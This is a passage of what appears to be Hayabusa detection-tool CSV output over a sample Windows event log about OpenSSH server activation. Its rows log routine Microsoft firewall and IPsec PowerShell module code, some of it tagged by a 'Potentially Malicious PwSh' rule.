= 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"dletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.701 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.701 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.702 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.733 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.733 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetSecDeltaCollection' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.740 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.741 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuth",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.779 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecDoSPSetting' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxStateEntries}, 